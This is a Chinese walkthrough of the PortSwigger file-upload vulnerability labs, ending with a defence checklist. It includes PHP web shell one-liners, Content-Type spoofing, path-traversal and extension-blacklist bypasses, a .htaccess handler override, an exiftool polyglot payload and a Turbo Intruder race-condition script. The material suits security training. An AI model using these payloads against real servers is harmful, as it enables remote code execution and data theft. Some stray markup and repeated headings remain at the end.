文件上传漏洞攻防实战：PortSwigger靶场通关指南<\/h1>

文件上传漏洞概述<\/h2>
文件上传漏洞是指Web应用程序对用户上传的文件缺乏完善的检验机制，导致攻击者能够上传恶意文件到服务器。这些恶意文件可被用于执行任意代码、影响客户端用户等攻击行为。<\/p>

基础攻击场景<\/h2>

Lab1: 直接上传Web Shell执行命令<\/h3>

漏洞描述<\/strong>：无任何防御措施的文件上传<\/li>

攻击方法<\/strong>：

直接上传PHP脚本文件<\/li>
脚本内容示例：<?php echo file_get_contents('\/home\/carlos\/secret'); ?><\/code><\/li>
访问上传的脚本文件获取敏感信息<\/li> <\/ul> <\/li> <\/ul> Lab2: 绕过Content-Type限制<\/h3> 漏洞描述<\/strong>：应用仅检查Content-Type头判断文件类型<\/li> 攻击方法<\/strong>：上传恶意脚本文件<\/li> 拦截请求，修改Content-Type为合法类型（如image\/jpeg<\/code>）<\/li> 绕过检查成功上传<\/li> <\/ol> <\/li> <\/ul> 高级绕过技术<\/h2> Lab3: 路径遍历上传<\/h3> 漏洞描述<\/strong>：应用限制上传目录的执行权限<\/li> 攻击方法<\/strong>：尝试使用..\/<\/code>进行目录遍历<\/li> 若被过滤，尝试URL编码：%2e%2e%2f<\/code><\/li> 上传文件到可执行目录<\/li> <\/ul> <\/li> <\/ul> Lab4: 扩展名黑名单绕过<\/h3> 漏洞描述<\/strong>：使用黑名单机制限制文件扩展名<\/li> 绕过技术<\/strong>：使用非常见PHP扩展名：.php5<\/code>, .pht<\/code>, .phpt<\/code>, .phtml<\/code>, .php3<\/code>, .php4<\/code>, .php6<\/code><\/li> 大小写混淆：.pHp<\/code><\/li> 多扩展名：file.php.jpg<\/code>（依赖服务器解析顺序）<\/li> 尾随字符：file.php.<\/code>或file.php <\/code>（空格）<\/li> URL编码：file%2ephp<\/code><\/li> 分号或空字符：file.php;jpg<\/code>或file.php%00.jpg<\/code><\/li> Unicode字符：如xC0 xAE<\/code>可能被解析为.<\/code>（点）<\/li> <\/ol> <\/li> <\/ul> Apache服务器特定绕过<\/strong>：<\/p> 上传.htaccess<\/code>文件：<\/li> <\/ol> AddType application\/x-httpd-php .php5 <\/span><\/span><\/code><\/pre> 上传.php5<\/code>文件并访问<\/li> <\/ol> Lab5: 混淆扩展名<\/h3> 攻击方法<\/strong>：使用多扩展名结合空字符：shell.php%00.jpg<\/code><\/li> 利用服务器解析特性绕过检查<\/li> <\/ul> <\/li> <\/ul> 高级攻击技术<\/h2> Lab6: 多态Web Shell上传<\/h3> 漏洞描述<\/strong>：应用检查文件内容特征<\/li> 攻击方法<\/strong>：使用exiftool在合法图片中插入PHP代码：<\/li> <\/ul> exiftool -Comment=<\/span>"<?php echo 'START ' . file_get_contents('\/home\/carlos\/secret') . ' END'; ?>"<\/span> input.jpg -o polyglot.php <\/span><\/span><\/code><\/pre> 上传生成的"多态"文件（既是合法图片又包含恶意代码）<\/li> <\/ul> <\/li> <\/ul> Lab7: 条件竞争攻击<\/h3> 漏洞描述<\/strong>：应用先存储后检查，检查不通过则删除<\/li> 攻击方法<\/strong>：使用Burp Suite Turbo Intruder插件<\/li> 并发执行上传请求和访问请求<\/li> 在文件被删除前快速访问<\/li> <\/ol> <\/li> <\/ul> Turbo Intruder脚本示例<\/strong>：<\/p> def<\/span> queueRequests<\/span>(target, wordlists): <\/span><\/span> engine =<\/span> RequestEngine(endpoint=<\/span>target.<\/span>endpoint, concurrentConnections=<\/span>10<\/span>) <\/span><\/span> <\/span><\/span> # 上传请求<\/span> <\/span><\/span> request1 =<\/span> '''POST \/upload HTTP\/2...'''<\/span> <\/span><\/span> <\/span><\/span> # 访问请求<\/span> <\/span><\/span> request2 =<\/span> '''GET \/files\/uploaded\/shell.php HTTP\/2...'''<\/span> <\/span><\/span> <\/span><\/span> engine.<\/span>queue(request1, gate=<\/span>'race1'<\/span>) <\/span><\/span> for<\/span> x in<\/span> range(5<\/span>): <\/span><\/span> engine.<\/span>queue(request2, gate=<\/span>'race1'<\/span>) <\/span><\/span> engine.<\/span>openGate('race1'<\/span>) <\/span><\/span> engine.<\/span>complete(timeout=<\/span>60<\/span>) <\/span><\/span><\/code><\/pre>非RCE利用场景<\/h2> 存储型XSS<\/strong>：<\/p> 上传包含恶意JavaScript的文件<\/li> 当其他用户访问该文件时触发XSS攻击<\/li> <\/ul> <\/li> XXE漏洞<\/strong>：<\/p> 上传特殊格式文件（如docx、xls）<\/li> 利用文件解析过程中的XXE漏洞<\/li> <\/ul> <\/li> <\/ol> 防御措施<\/h2> 文件扩展名验证<\/strong>：<\/p> 使用白名单而非黑名单机制<\/li> 严格限制允许的文件类型<\/li> <\/ul> <\/li> 文件名处理<\/strong>：<\/p> 过滤目录遍历序列（..\/<\/code>）<\/li> 对上传文件重命名（如使用UUID）<\/li> <\/ul> <\/li> 内容验证<\/strong>：<\/p> 检查文件内容与扩展名是否匹配<\/li> 对图片进行重渲染处理<\/li> <\/ul> <\/li> 存储策略<\/strong>：<\/p> 文件检验完成前不存入文件系统<\/li> 存储在非Web可访问目录<\/li> <\/ul> <\/li> 执行限制<\/strong>：<\/p> 设置上传目录无执行权限<\/li> 使用CDN或单独域名托管用户上传内容<\/li> <\/ul> <\/li> 使用成熟框架<\/strong>：<\/p> 避免自行实现文件上传逻辑<\/li> 使用经过安全审计的库\/框架<\/li> <\/ul> <\/li> <\/ol> 通过全面实施这些防御措施，可有效降低文件上传漏洞的风险。安全团队应定期进行安全测试，确保防御机制的有效性。<\/p>

文件上传漏洞攻防实战：PortSwigger靶场通关指南<\/h1>

文件上传漏洞概述<\/h2> 文件上传漏洞是指Web应用程序对用户上传的文件缺乏完善的检验机制，导致攻击者能够上传恶意文件到服务器。这些恶意文件可被用于执行任意代码、影响客户端用户等攻击行为。<\/p>

基础攻击场景<\/h2>

高级绕过技术<\/h2>

高级攻击技术<\/h2>

文件上传漏洞概述<\/h2>
文件上传漏洞是指Web应用程序对用户上传的文件缺乏完善的检验机制，导致攻击者能够上传恶意文件到服务器。这些恶意文件可被用于执行任意代码、影响客户端用户等攻击行为。<\/p>